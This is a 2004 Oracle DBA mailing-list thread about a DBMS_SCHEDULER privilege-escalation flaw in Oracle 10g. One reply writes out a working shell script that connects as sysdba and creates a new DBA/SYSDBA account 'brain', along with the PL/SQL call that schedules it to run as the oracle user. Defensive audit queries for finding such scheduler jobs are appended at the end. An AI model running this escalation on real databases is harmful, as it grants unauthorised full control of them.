
RE: PeteFinnigan.com Oracle advisory for bugs in dbms_scheduler ( alert #68)

From: Gogala, Mladen <Mladen.Gogala_at_aetn.com>
Date: Thu, 2 Sep 2004 12:00:41 -0400
Message-ID: <30462D80AA52E74698512ADCC4F7EAA312239722@EXCHANGE>


What annoys me the most is that the bug is so trivial that it should have been discovered during the beta test. You and Pete didn't specify how exactly it is possible, probably out of the goodness of your heart, so I did a little investigation of my own, and discovered that Oracle10g allows shell scripts to be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still uses job queue processes owned by user oracle to schedule those shell scripts. The thing that can be done is to schedule a shell script containing the following sequence:

#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering?">/dev/console
ORAENV_ASK=NO
ORACLE_SID=<sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba"<<EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF

If this script is executed by a process owned by user "oracle", "connect / as sysdba" will succeed. The database is mine.

All you need to do is to run something like this:

BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
   program_name           => 'take_over_the_world',
   program_action         => '/tmp/pinky_and_the_brain',
   program_type           => 'EXECUTABLE',
   comments               => 'I rulez');
END;
/

and you are ready to create the job and run it. I was astonished how simple and trivial the flaw is. Someone should have thought of that during beta testing. Now, let me put on a wide smile and ask: is that the bug that you and Pete have found?

--
Mladen Gogala
Oracle DBA
email:mladeng_at_aetvn.com
Ext: 9787



> -----Original Message-----
> From: Jonathan Gennick [mailto:jonathan_at_gennick.com]
> Sent: Thursday, September 02, 2004 8:33 AM
> To: Pete Finnigan
> Cc: oracle-l_at_freelists.org
> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
> dbms_scheduler (alert #68)
>
>
> This alert apparently covers several flaws. I'm actually
> taken aback by how long it's taken Oracle to respond to the
> one Pete and I uncovered back in March, which lets you
> leverage the new scheduler to gain access to the Oracle user,
> and thence to grant yourself DBA privileges.
>
> Best regards,
>
> Jonathan Gennick --- Brighten the corner where you are
> http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com
>
> Join the Oracle-article list and receive one article on Oracle
> technologies per month by email. To join, visit
> http://five.pairlist.net/mailman/listinfo/oracle-article, or send
> email to Oracle-article-request_at_gennick.com and include the word
> "subscribe" in either the subject or body.
>
> Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan (oracle_list_at_peterfinnigan.demon.co.uk) wrote:
> PF> Hi everyone,
> PF> Oracle released last night alert #68 covering fixes for many
> PF> security bugs in Oracle. PeteFinnigan.com found security bugs in the
> PF> new 10gR1 scheduler functionality. Our security advisory can be
> PF> found at http://www.petefinnigan.com/alerts.htm
> PF> Kind regards
> PF> Pete
>
> ---
> To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe
> To read recent messages - http://freelists.org/archives/oracle-l/09-2004
Received on Thu Sep 02 2004 - 15:58:04 CDT
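
For a DBA checking a database for the scheduler behaviour discussed in this thread, the audit queries below are an added example, not part of the original messages or of the PeteFinnigan.com advisory. They assume the standard Oracle dictionary views DBA_SCHEDULER_PROGRAMS, DBA_SCHEDULER_JOBS and DBA_SYS_PRIVS, none of which is named in the thread.

```sql
-- Added audit example (not from the thread). Run as a user that can
-- read the DBA_* dictionary views.

-- 1. Scheduler programs whose action is an operating-system executable.
--    Each one runs with the OS identity of the job queue processes.
SELECT owner, program_name, program_action, enabled
FROM   dba_scheduler_programs
WHERE  program_type = 'EXECUTABLE'
ORDER  BY owner, program_name;

-- 2. Jobs that launch an OS executable, either defined inline
--    (job_type = 'EXECUTABLE') or indirectly through a program from
--    query 1. job_action is NULL for program-backed jobs, so fall back
--    to the program's action to show the command that actually runs.
SELECT j.owner,
       j.job_name,
       NVL(j.job_action, p.program_action) AS os_command,
       j.enabled,
       j.state
FROM   dba_scheduler_jobs j
       LEFT JOIN dba_scheduler_programs p
              ON  p.owner        = j.program_owner
              AND p.program_name = j.program_name
WHERE  j.job_type = 'EXECUTABLE'
   OR  p.program_type = 'EXECUTABLE'
ORDER  BY j.owner, j.job_name;

-- 3. Accounts and roles able to create scheduler jobs. Review every
--    grantee that is not an administrative account.
--    CREATE EXTERNAL JOB is matched only on releases that have that
--    privilege; on others the row set simply omits it.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB')
ORDER  BY privilege, grantee;
```

Rows from queries 1 and 2 owned by non-administrative schemas, or pointing at world-writable paths such as /tmp, are the ones to investigate first.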
